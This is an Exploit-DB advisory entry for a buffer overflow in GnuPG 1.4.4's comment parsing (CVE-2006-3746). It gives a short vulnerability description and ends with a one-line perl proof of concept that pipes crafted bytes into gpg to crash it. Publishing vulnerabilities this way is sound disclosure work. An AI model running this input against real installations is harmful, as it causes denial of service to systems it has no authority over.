GnuPG 1.4/1.9 Parse_Comment Remote Buffer Overflow Vulnerability

2006-07-22T00:00:00
ID EDB-ID:28257
Type exploitdb
Reporter Evgeny Legerov
Modified 2006-07-22T00:00:00

Description

GnuPG 1.4/1.9 Parse_Comment Remote Buffer Overflow Vulnerability. CVE-2006-3746 . Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/19110/info

GnuPG is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

This issue may allow remote attackers to execute arbitrary machine code in the context of the affected application, but this has not been confirmed.

GnuPG version 1.4.4 is vulnerable to this issue; previous versions may also be affected.

perl -e 'print "\xfd\xff\xff\xff\xff\xfe"'| /var/gnupg/bin/gpg --no-armor